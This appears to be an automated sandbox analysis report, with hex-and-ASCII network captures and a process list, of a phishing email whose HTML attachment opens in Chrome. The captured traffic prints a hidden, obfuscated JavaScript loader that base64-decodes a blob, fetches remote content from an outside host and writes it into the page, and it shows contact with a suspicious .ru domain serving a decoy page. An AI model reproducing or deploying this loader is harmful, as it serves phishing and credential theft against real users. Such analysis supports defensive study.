                                                                2024-08-27 18:03:43 UTC1369INData Raw: 74 3a 20 31 37 39 70 78 3b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 39 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 70 78 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 68 61 64 6f 77 2d 66 61 64 65 20 7b 30 25 2c 20 31 30 30 25 2c 20 32 31 2e 32 25 2c 20 38 30 25 20 7b 6f 70 61 63 69 74 79 3a 20 30 3b 7d 34 37 25 2c 20 37 30 25 20 7b 6f 70 61 63 69 74 79 3a 20 31 3b 7d 7d 23 68 61 62 69 74 61 74 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 39 70 78 3b 7d 23 68 61 69 6c 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 37 31 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 20 30 20 37 70 78 20
                                                                Data Ascii: t: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#habitat {width: 130px;margin-top: 179px;}#hail {width: 130px;height: 71px;border-radius: 0 0 7px
                                                                2024-08-27 18:03:43 UTC1369INData Raw: 39 2e 33 33 33 33 70 78 3b 68 65 69 67 68 74 3a 20 33 38 70 78 3b 7d 2e 77 61 69 6e 73 63 6f 74 69 6e 67 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 37 33 63 63 3b 7d 2e 69 63 68 74 68 79 6f 6c 6f 67 69 73 74 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 37 61 30 65 30 3b 7d 2e 69 63 6f 6e 6f 67 72 61 70 68 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 66 63 66 66 66 3b 7d 2e 61 62 64 75 63 74 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 33 35 66 62 33 3b 7d 2e 6b 61 79 61 6b 69 6e 67 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 33 34 32 37 36 3b 7d 23 64 61 68 6c 69 61 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 37 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 70 65 6e 65 64 2d 66 6c 61 70 2d 73 77 69 6e
                                                                Data Ascii: 9.3333px;height: 38px;}.wainscoting {background: #0073cc;}.ichthyologist {background: #27a0e0;}.iconography {background: #4fcfff;}.abduct {background: #035fb3;}.kayaking {background: #134276;}#dahlia {width: 130px;height: 107px;animation: opened-flap-swin
                                                                2024-08-27 18:03:43 UTC1369INData Raw: 6e 63 65 20 61 6e 64 20 70 65 72 73 65 76 65 72 61 6e 63 65 2e 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 69 63 65 64 22 20 68 69 64 64 65 6e 3e 3c 64 69 76 20 69 64 3d 22 68 61 62 69 74 61 74 22 3e 3c 64 69 76 20 69 64 3d 22 64 61 68 6c 69 61 22 3e 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 64 72 6f 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 63 6f 6e 69 63 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 63 61 62 69 6e 65 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 61 63 6b 73 74 72 61 77 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 62 61 73 68 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 6f 69 64 20 77 61 69 6e 73 63 6f 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c
                                                                Data Ascii: nce and perseverance. --><div id="iced" hidden><div id="habitat"><div id="dahlia"><div id="backdrop"><div class="laconic"></div></div></div><div id="cabinet"><div class="jackstraw"></div><div class="abash"><div class="tabloid wainscoting"></div><div cl
                                                                2024-08-27 18:03:43 UTC1260INData Raw: 0d 0a 09 09 69 63 65 64 2e 68 69 64 64 65 6e 20 3d 20 30 3b 0d 0a 09 09 79 65 61 72 6e 2e 68 69 64 64 65 6e 20 3d 20 31 3b 0d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 61 77 61 69 74 20 6c 61 62 6f 72 65 64 28 61 77 61 69 74 20 28 61 77 61 69 74 20 66 65 74 63 68 28 61 77 61 69 74 20 6c 61 62 6f 72 65 64 28 61 74 6f 62 28 60 65 79 4a 68 49 6a 6f 69 63 56 52 54 55 30 6c 78 65 55 68 6d 57 58 63 34 61 6a 52 53 59 58 70 57 4f 46 5a 54 51 30 5a 31 55 30 35 6c 54 43 74 63 4c 32 34 79 57 6c 46 75 64 45 31 50 56 7a 42 49 56 44 67 39 49 69 77 69 59 79 49 36 49 6a 6b 32 5a 6a 6b 34 59 7a 67 30 4d 6d 46 6d 4f 54 4a 6a 4e 54 4a 6b 4e 44 46 6a 4f 47 51 32 59 6a 55 78 5a 44 51 31 4f 54 63 32 49 69 77 69 59 69 49 36 49 6a 63 32 59 7a 4e 69
                                                                Data Ascii: iced.hidden = 0;yearn.hidden = 1; document.write(await labored(await (await fetch(await labored(atob(`eyJhIjoicVRTU0lxeUhmWXc4ajRSYXpWOFZTQ0Z1U05lTCtcL24yWlFudE1PVzBIVDg9IiwiYyI6Ijk2Zjk4Yzg0MmFmOTJjNTJkNDFjOGQ2YjUxZDQ1OTc2IiwiYiI6Ijc2YzNi
                                                                2024-08-27 18:03:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.164975135.190.80.14433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:43 UTC657OUTOPTIONS /report/v4?s=U7%2BK5hrqUk8%2Bv3S2CzKfyl4T%2Brrst8y91qI8Q5qwViKcMnOjLWNNxoHM5lYf6%2FemYFORrI8JlwH%2BD66s24645unYMudINmOWUWaovHuWQXcIdZK3mtOYGRvi02Y7MUJwEctCwjxvcIrVGJWFOtAf9ioLlU1tBjQVFCsTPwIykuyY%2Fp8b75CXU1yB%2B1PzBJDZKg%3D%3D HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Origin: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Access-Control-Request-Method: POST
                                                                Access-Control-Request-Headers: content-type
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:43 UTC336INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                access-control-max-age: 86400
                                                                access-control-allow-methods: OPTIONS, POST
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: content-length, content-type
                                                                date: Tue, 27 Aug 2024 18:03:42 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.164975235.190.80.14433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:43 UTC552OUTPOST /report/v4?s=U7%2BK5hrqUk8%2Bv3S2CzKfyl4T%2Brrst8y91qI8Q5qwViKcMnOjLWNNxoHM5lYf6%2FemYFORrI8JlwH%2BD66s24645unYMudINmOWUWaovHuWQXcIdZK3mtOYGRvi02Y7MUJwEctCwjxvcIrVGJWFOtAf9ioLlU1tBjQVFCsTPwIykuyY%2Fp8b75CXU1yB%2B1PzBJDZKg%3D%3D HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 487
                                                                Content-Type: application/reports+json
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:43 UTC487OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 68 64 6a 61 6a 73 64 67 61 67 73 6a 68 66 67 64 66 64 68 61 66 67 68 6a 61 66 67 66 64 6a 67 61 68 64 66 67 73 67 64 66 67 68 64 73 6e 6d 66 62 73 64 73 2e 70 61 67 65 73 2e 64 65 76 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c
                                                                Data Ascii: [{"age":0,"body":{"elapsed_time":63,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/","sampling_fraction":1.0,"server_ip":"","status_code":0,"type":"abandoned"},
                                                                2024-08-27 18:03:43 UTC168INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                date: Tue, 27 Aug 2024 18:03:43 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.1649753172.67.181.394433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:45 UTC349OUTGET ///4539.php HTTP/1.1
                                                                Host: glansaolksnu.ru
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:45 UTC774INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-powered-by: PHP/7.3.33
                                                                access-control-allow-origin: *
                                                                cache-control: no-store, no-cache, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SpTELIQ1QWGUSQYlcS26z3ZllZhYwVEnnw475yN87WVDrV%2B9IGuM48H9gyNJNQ7EcwmRFdwQPvFMabO0grF6Rs0MkpGIfKhPUvWeNgVAh4ZnyskPlGoP4DXJ2tjE%2F3XaAX4%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfae71fd94322-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:45 UTC595INData Raw: 31 61 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 75 74 6f 6d 6f 62 69 6c 65 20 48 69 73 74 6f 72 79 20 46 61 6e 73 20 2d 20 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74
                                                                Data Ascii: 1adf<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Automobile History Fans - glansaolksnu.ru</title> <link href="https://cdn.jsdelivr.net
                                                                2024-08-27 18:03:45 UTC1369INData Raw: 2f 2f 74 68 2e 62 69 6e 67 2e 63 6f 6d 2f 74 68 2f 69 64 2f 4f 49 50 2e 63 59 72 59 4c 61 4b 75 47 37 31 55 43 65 55 35 56 78 6f 53 6d 67 48 61 45 6f 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: //th.bing.com/th/id/OIP.cYrYLaKuG71UCeU5VxoSmgHaEo') no-repeat center center; background-size: cover; color: white; padding: 150px 0; text-align: center; } .content-section {
                                                                2024-08-27 18:03:45 UTC1369INData Raw: 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 61 62 6f 75 74 22 3e 41 62 6f 75 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: //glansaolksnu.ru/#">Home</a> </li> <li class="nav-item"> <a class="nav-link" href="https://glansaolksnu.ru/#about">About</a> </li> <li class="nav-item">
                                                                2024-08-27 18:03:45 UTC1369INData Raw: 33 64 30 39 32 65 32 35 32 38 32 37 33 61 32 38 32 36 32 35 32 32 33 61 32 37 33 63 36 37 33 62 33 63 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 5f 63 66 5f 65 6d 61 69 6c 5f 5f 22 20 64 61 74 61 2d 63 66 65 6d 61 69 6c 3d 22 37 64 31 65 31 32 31 33 30 39 31 63 31 65 30 39 33 64 31 61 31 31 31 63 31 33 30 65 31 63 31 32 31 31 31 36 30 65 31 33 30 38 35 33 30 66 30 38 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 20 6f 72 20 63 61 6c 6c 20 75 73 20 61 74 20 37 37 37 2d 35 31 39 2d 31 36 35 35 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 71 75 6f 74 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: 3d092e2528273a282625223a273c673b3c"><span class="__cf_email__" data-cfemail="7d1e1213091c1e093d1a111c130e1c1211160e1308530f08">[email&#160;protected]</span></a> or call us at 777-519-1655.</p> <blockquote class="blockquote">
                                                                2024-08-27 18:03:45 UTC1369INData Raw: 22 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 62 6f 64 79 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 69 74 6c 65 22 3e 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 73 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 65 78 74 22 3e 45 78 70 6c 6f 72 65 20 74 68 65 20 6c 61 74 65 73 74 20 61 6e 64 20 67 72 65 61 74 65 73 74 20 69 6e 20 73 75 70 65 72 63 61 72 20 74 65 63 68 6e 6f 6c 6f 67 79 2c 20 70 65 72 66 6f 72 6d 61 6e 63 65 2c 20 61 6e 64 20 64 65
                                                                Data Ascii: "Modern Supercar"> <div class="card-body"> <h5 class="card-title">Modern Supercars</h5> <p class="card-text">Explore the latest and greatest in supercar technology, performance, and de
                                                                2024-08-27 18:03:45 UTC816INData Raw: 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 70 72 69 76 61 63 79 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 74 65 72 6d 73 22 3e 54 65 72 6d 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20
                                                                Data Ascii: <li class="list-inline-item"> <a href="https://glansaolksnu.ru/#privacy">Privacy</a> </li> <li class="list-inline-item"> <a href="https://glansaolksnu.ru/#terms">Terms</a> </li>
                                                                2024-08-27 18:03:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.164975440.68.123.157443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:59 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=USmGenYh+nnGnwz&MD=Om4EY1cl HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                Host: slscr.update.microsoft.com
                                                                2024-08-27 18:04:00 UTC560INHTTP/1.1 200 OK
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Content-Type: application/octet-stream
                                                                Expires: -1
                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                MS-CorrelationId: 90c7da0c-4ee0-438c-b77d-8e50198b9d52
                                                                MS-RequestId: e41a79ba-9675-40ec-ab40-3c6ea3c34a91
                                                                MS-CV: 7dko9VK1MkycHV3Y.0
                                                                X-Microsoft-SLSClientCache: 1440
                                                                Content-Disposition: attachment; filename=environment.cab
                                                                X-Content-Type-Options: nosniff
                                                                Date: Tue, 27 Aug 2024 18:03:59 GMT
                                                                Connection: close
                                                                Content-Length: 30005
                                                                2024-08-27 18:04:00 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                2024-08-27 18:04:00 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:14:03:08
                                                                Start date:27/08/2024
                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\(No subject) (59).eml"
                                                                Imagebase:0x800000
                                                                File size:34'446'744 bytes
                                                                MD5 hash:91A5292942864110ED734005B7E005C0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:2
                                                                Start time:14:03:10
                                                                Start date:27/08/2024
                                                                Path:C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A7A183EE-2C77-4E4F-B725-8BFB05112EFD" "BB25D3F2-0E53-48AB-AEB6-C8D394DB4A1D" "6300" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                                                                Imagebase:0x7ff6ecd40000
                                                                File size:710'048 bytes
                                                                MD5 hash:EC652BEDD90E089D9406AFED89A8A8BD
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:13
                                                                Start time:14:03:26
                                                                Start date:27/08/2024
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\9AYNO56K\https___worker-rough-fire-759a.berwieberwieberwieberwieberwie.workers.dev__eba.htm
                                                                Imagebase:0x7ff7f9810000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:14
                                                                Start time:14:03:26
                                                                Start date:27/08/2024
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1892,i,9245279310227330186,10471409212355805271,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                Imagebase:0x7ff7f9810000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                No disassembly